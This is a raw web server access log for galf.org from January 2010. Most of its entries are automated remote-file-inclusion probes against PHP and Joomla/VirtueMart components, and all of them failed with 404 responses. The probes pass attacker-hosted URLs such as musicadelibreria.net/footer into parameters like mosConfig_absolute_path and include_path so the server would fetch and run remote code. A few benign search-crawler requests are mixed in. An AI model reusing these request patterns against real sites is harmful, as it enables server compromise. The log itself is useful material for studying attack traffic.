69.175.68.18 - - [17/Jan/2010:17:09:41 -0800] "GET /logs/access_091026.log//modules/protector/oninstall.php?mydirname=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:17:09:42 -0800] "GET /logs/access_091026.log%20%20//modules/protector/oninstall.php?mydirname=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:17:09:50 -0800] "GET /modules/protector/oninstall.php?mydirname=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:17:09:50 -0800] "GET /logs//modules/protector/oninstall.php?mydirname=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:17:09:50 -0800] "GET /logs/access_091026.log//modules/protector/oninstall.php?mydirname=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:17:09:50 -0800] "GET /logs/access_091012.log//modules/protector/oninstall.php?mydirname=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.6.163.20 - - [17/Jan/2010:17:09:55 -0800] "GET /logs/access.log HTTP/1.1" 200 26892 "-" "Mozilla/8.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:17:10:02 -0800] "GET /logs//modules/protector/oninstall.php?mydirname=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:17:10:02 -0800] "GET /logs/access_091012.log//modules/protector/oninstall.php?mydirname=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:17:10:02 -0800] "GET /modules/protector/oninstall.php?mydirname=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:17:10:03 -0800] "GET /logs/access_091026.log//modules/protector/oninstall.php?mydirname=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:17:10:04 -0800] "GET /logs/access_091012.log//modules/protector/oninstall.php?mydirname=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:17:10:04 -0800] "GET /modules/protector/oninstall.php?mydirname=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:17:10:04 -0800] "GET /logs/access_091026.log//modules/protector/oninstall.php?mydirname=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:17:10:04 -0800] "GET /logs//modules/protector/oninstall.php?mydirname=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:17:10:11 -0800] "GET /logs/access_091116.log//modules/protector/oninstall.php?mydirname=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:17:10:11 -0800] "GET /modules/protector/oninstall.php?mydirname=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:17:10:11 -0800] "GET /logs//modules/protector/oninstall.php?mydirname=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:17:10:14 -0800] "GET /logs/access_091026.log//modules/protector/oninstall.php?mydirname=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.161.125 - - [17/Jan/2010:17:12:04 -0800] "GET /logs///citywriter/head.php?path=http://www.fussball-brieselang.de//administrator/components/com_admin/tmpl/1txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.161.125 - - [17/Jan/2010:17:12:04 -0800] "GET /logs/access_090907.log%20%20///citywriter/head.php?path=http://www.fussball-brieselang.de//administrator/components/com_admin/tmpl/1txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.161.125 - - [17/Jan/2010:17:12:04 -0800] "GET //citywriter/head.php?path=http://www.fussball-brieselang.de//administrator/components/com_admin/tmpl/1txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.161.125 - - [17/Jan/2010:17:12:06 -0800] "GET /logs/access_090629.log%20%20///citywriter/head.php?path=http://www.fussball-brieselang.de//administrator/components/com_admin/tmpl/1txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.161.125 - - [17/Jan/2010:17:12:06 -0800] "GET /logs/access_090921.log%20%20///citywriter/head.php?path=http://www.fussball-brieselang.de//administrator/components/com_admin/tmpl/1txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.161.125 - - [17/Jan/2010:17:12:06 -0800] "GET /logs/access_091019.log%20%20///citywriter/head.php?path=http://www.fussball-brieselang.de//administrator/components/com_admin/tmpl/1txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.161.125 - - [17/Jan/2010:17:12:06 -0800] "GET /logs/access_091123.log%20%20///citywriter/head.php?path=http://www.fussball-brieselang.de//administrator/components/com_admin/tmpl/1txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.161.125 - - [17/Jan/2010:17:12:07 -0800] "GET /logs/access_090831.log%20%20///citywriter/head.php?path=http://www.fussball-brieselang.de//administrator/components/com_admin/tmpl/1txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.161.125 - - [17/Jan/2010:17:12:17 -0800] "GET /logs/access_091012.log%20%20///citywriter/head.php?path=http://www.fussball-brieselang.de//administrator/components/com_admin/tmpl/1txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.6.163.20 - - [17/Jan/2010:17:13:46 -0800] "GET /logs/access.log HTTP/1.1" 200 31686 "-" "Mozilla/8.0" "www.galf.org"
89.111.176.66 - - [17/Jan/2010:17:14:13 -0800] "GET /logs/access_091026.log//modules/protector/oninstall.php?mydirname=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.111.176.66 - - [17/Jan/2010:17:14:13 -0800] "GET /modules/protector/oninstall.php?mydirname=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.111.176.66 - - [17/Jan/2010:17:14:13 -0800] "GET /logs/access_091012.log//modules/protector/oninstall.php?mydirname=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.111.176.66 - - [17/Jan/2010:17:14:13 -0800] "GET /logs//modules/protector/oninstall.php?mydirname=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [17/Jan/2010:17:14:15 -0800] "GET /logs/access.log%20%20//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
69.16.230.82 - - [17/Jan/2010:17:14:15 -0800] "GET /logs//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
69.16.230.82 - - [17/Jan/2010:17:14:15 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.122.161.125 - - [17/Jan/2010:17:14:32 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.122.161.125 - - [17/Jan/2010:17:14:32 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.122.161.125 - - [17/Jan/2010:17:14:33 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
69.16.230.82 - - [17/Jan/2010:17:14:43 -0800] "GET /logs//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
69.16.230.82 - - [17/Jan/2010:17:14:43 -0800] "GET /logs/access.log//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
69.16.230.82 - - [17/Jan/2010:17:14:43 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.122.161.125 - - [17/Jan/2010:17:16:09 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.161.125 - - [17/Jan/2010:17:16:10 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.161.125 - - [17/Jan/2010:17:16:10 -0800] "GET /logs/access_100111.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.46.199.189 - - [17/Jan/2010:17:17:16 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
207.46.199.189 - - [17/Jan/2010:17:18:34 -0800] "GET /tmp/?N=D HTTP/1.1" 200 520 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
69.16.230.82 - - [17/Jan/2010:17:19:32 -0800] "GET /sirini_ezset_fullpack/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [17/Jan/2010:17:19:32 -0800] "GET /logs//sirini_ezset_fullpack/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [17/Jan/2010:17:19:32 -0800] "GET /logs/access_091109.log//sirini_ezset_fullpack/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
188.93.208.12 - - [17/Jan/2010:17:19:40 -0800] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
188.93.208.12 - - [17/Jan/2010:17:19:40 -0800] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
188.93.208.12 - - [17/Jan/2010:17:19:40 -0800] "GET /logs/access_091102.log/skins/advanced/advanced1.php?pluginpath[0]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.37.161 - - [17/Jan/2010:17:20:37 -0800] "GET /logs/access_090727.log HTTP/1.0" 200 5508747 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
110.45.136.177 - - [17/Jan/2010:17:20:39 -0800] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.136.177 - - [17/Jan/2010:17:20:39 -0800] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.136.177 - - [17/Jan/2010:17:20:39 -0800] "GET /logs/access_091102.log/skins/advanced/advanced1.php?pluginpath[0]=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
188.93.208.12 - - [17/Jan/2010:17:22:20 -0800] "GET /logs/access_090803.log/skins/advanced/advanced1.php?pluginpath[0]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
119.205.214.19 - - [17/Jan/2010:17:24:42 -0800] "GET /playing.php/common/db.php?commonpath=http://www.labottevini.com/pub/idfx1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
119.205.214.19 - - [17/Jan/2010:17:24:43 -0800] "GET /playing.php/common/db.php?commonpath=http://www.labottevini.com/pub/idfx1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:17:24:50 -0800] "GET /logs//appserv/main.php?appserv_root=http://astro1.fileave.com/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
119.205.214.19 - - [17/Jan/2010:17:24:51 -0800] "GET /logs/access_090921.log%20%20/playing.php/common/db.php?commonpath=http://www.labottevini.com/pub/idfx1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
119.205.214.19 - - [17/Jan/2010:17:24:51 -0800] "GET /logs/playing.php/common/db.php?commonpath=http://www.labottevini.com/pub/idfx1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
119.205.214.19 - - [17/Jan/2010:17:24:51 -0800] "GET /logs/access_090921.log%20%20/playing.php/common/db.php?commonpath=http://www.labottevini.com/pub/idfx1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
119.205.214.19 - - [17/Jan/2010:17:24:51 -0800] "GET /logs/playing.php/common/db.php?commonpath=http://www.labottevini.com/pub/idfx1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:17:24:54 -0800] "GET /logs//appserv/main.php?appserv_root=http://astro1.fileave.com/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.136.177 - - [17/Jan/2010:17:25:31 -0800] "GET /logs/access_090803.log/skins/advanced/advanced1.php?pluginpath[0]=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.114.13.126 - - [17/Jan/2010:17:26:55 -0800] "GET //poll/booth.php?include_path=http://throner.com/chid.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
212.114.13.126 - - [17/Jan/2010:17:26:55 -0800] "GET /logs/access_100104.log///poll/booth.php?include_path=http://throner.com/chid.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
212.114.13.126 - - [17/Jan/2010:17:26:55 -0800] "GET /logs///poll/booth.php?include_path=http://throner.com/chid.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
119.205.214.19 - - [17/Jan/2010:17:27:27 -0800] "GET /logs/access_091102.log%20%20/playing.php/common/db.php?commonpath=http://www.labottevini.com/pub/idfx1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
119.205.214.19 - - [17/Jan/2010:17:27:27 -0800] "GET /logs/access_091102.log%20%20/playing.php/common/db.php?commonpath=http://www.labottevini.com/pub/idfx1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:17:29:28 -0800] "GET /logs/access.log//appserv/main.php?appserv_root=http://astro1.fileave.com/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.237.238.234 - - [17/Jan/2010:17:31:59 -0800] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://208.101.9.140/~teconfig/Fx29ID1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.237.238.234 - - [17/Jan/2010:17:31:59 -0800] "GET /logs/access_091130.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://208.101.9.140/~teconfig/Fx29ID1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.237.238.234 - - [17/Jan/2010:17:31:59 -0800] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://208.101.9.140/~teconfig/Fx29ID1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.237.238.234 - - [17/Jan/2010:17:32:46 -0800] "GET /logs/access_091109.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://208.101.9.140/~teconfig/Fx29ID1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.161.125 - - [17/Jan/2010:17:32:55 -0800] "GET /logs//popup_window.php?site_isp_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.161.125 - - [17/Jan/2010:17:32:55 -0800] "GET /popup_window.php?site_isp_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.161.125 - - [17/Jan/2010:17:32:55 -0800] "GET /logs/access_090706.log//popup_window.php?site_isp_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
38.100.8.50 - - [17/Jan/2010:17:33:15 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "panscient.com" "www.galf.org"
38.100.8.50 - - [17/Jan/2010:17:33:15 -0800] "GET / HTTP/1.1" 200 1048 "-" "panscient.com" "www.galf.org"
38.100.8.50 - - [17/Jan/2010:17:33:17 -0800] "GET /cendoc/ HTTP/1.1" 200 526 "-" "panscient.com" "www.galf.org"
38.100.8.50 - - [17/Jan/2010:17:33:18 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "panscient.com" "www.galf.org"
38.100.8.50 - - [17/Jan/2010:17:33:19 -0800] "GET /labia/ HTTP/1.1" 200 524 "-" "panscient.com" "www.galf.org"
38.100.8.50 - - [17/Jan/2010:17:33:20 -0800] "GET /logs/ HTTP/1.1" 200 4942 "-" "panscient.com" "www.galf.org"
203.253.25.15 - - [17/Jan/2010:17:33:22 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.253.25.15 - - [17/Jan/2010:17:33:22 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
38.100.8.50 - - [17/Jan/2010:17:33:22 -0800] "GET /cendoc/?N=D HTTP/1.1" 200 526 "-" "panscient.com" "www.galf.org"
203.253.25.15 - - [17/Jan/2010:17:33:23 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
38.100.8.50 - - [17/Jan/2010:17:33:23 -0800] "GET /cendoc/?N=A HTTP/1.1" 200 526 "-" "panscient.com" "www.galf.org"
38.100.8.50 - - [17/Jan/2010:17:33:24 -0800] "GET /labia/?N=D HTTP/1.1" 200 524 "-" "panscient.com" "www.galf.org"
38.100.8.50 - - [17/Jan/2010:17:33:26 -0800] "GET /cendoc/?D=A HTTP/1.1" 200 526 "-" "panscient.com" "www.galf.org"
38.100.8.50 - - [17/Jan/2010:17:33:27 -0800] "GET /cendoc/?D=D HTTP/1.1" 200 526 "-" "panscient.com" "www.galf.org"
38.100.8.50 - - [17/Jan/2010:17:33:28 -0800] "GET /?N=D HTTP/1.1" 200 1048 "-" "panscient.com" "www.galf.org"
38.100.8.50 - - [17/Jan/2010:17:33:30 -0800] "GET /?D=A HTTP/1.1" 200 1048 "-" "panscient.com" "www.galf.org"
203.253.25.15 - - [17/Jan/2010:17:34:43 -0800] "GET /logs/access_100111.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [17/Jan/2010:17:34:43 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [17/Jan/2010:17:34:43 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:17:35:07 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://astro1.fileave.com/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:17:35:10 -0800] "GET /skin/zero_vote/error.php?dir=http://astro1.fileave.com/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.161.125 - - [17/Jan/2010:17:35:19 -0800] "GET /logs//popup_window.php?site_isp_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.161.125 - - [17/Jan/2010:17:35:19 -0800] "GET /logs/access_091228.log//popup_window.php?site_isp_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.161.125 - - [17/Jan/2010:17:35:19 -0800] "GET /popup_window.php?site_isp_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.161.125 - - [17/Jan/2010:17:35:56 -0800] "GET /logs/access_090629.log//popup_window.php?site_isp_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:17:37:03 -0800] "GET /skin/zero_vote/error.php?dir=http://astro1.fileave.com/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:17:37:04 -0800] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://astro1.fileave.com/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:17:37:04 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://astro1.fileave.com/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:17:40:41 -0800] "GET /logs/access.log//appserv/main.php?appserv_root=http://astro1.fileave.com/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.161.125 - - [17/Jan/2010:17:42:24 -0800] "GET /index.php?page=shop.product_details&flypage=shop.flypage&product_id=76&option=com_phpshop&Itemid=1/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.161.125 - - [17/Jan/2010:17:42:24 -0800] "GET /logs/access_090803.log//index.php?page=shop.product_details&flypage=shop.flypage&product_id=76&option=com_phpshop&Itemid=1/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.161.125 - - [17/Jan/2010:17:42:25 -0800] "GET /logs//index.php?page=shop.product_details&flypage=shop.flypage&product_id=76&option=com_phpshop&Itemid=1/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.161.125 - - [17/Jan/2010:17:42:45 -0800] "GET /index.php?page=shop.product_details&flypage=shop.flypage&product_id=76&option=com_phpshop&Itemid=1/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.161.125 - - [17/Jan/2010:17:42:45 -0800] "GET /logs//index.php?page=shop.product_details&flypage=shop.flypage&product_id=76&option=com_phpshop&Itemid=1/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.161.125 - - [17/Jan/2010:17:42:45 -0800] "GET /logs/access_090803.log//index.php?page=shop.product_details&flypage=shop.flypage&product_id=76&option=com_phpshop&Itemid=1/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.80.193.27 - - [17/Jan/2010:17:42:49 -0800] "GET /labia23portugues/index.htm&sa=x&oi=translate&resnum=63&ct=result HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; YPC 3.0.1; FunWebProducts; .NET CLR 1.1.4322; SpamBlockerUtility 4.8.4)" "www.galf.org"
222.122.161.125 - - [17/Jan/2010:17:45:42 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.122.161.125 - - [17/Jan/2010:17:45:42 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
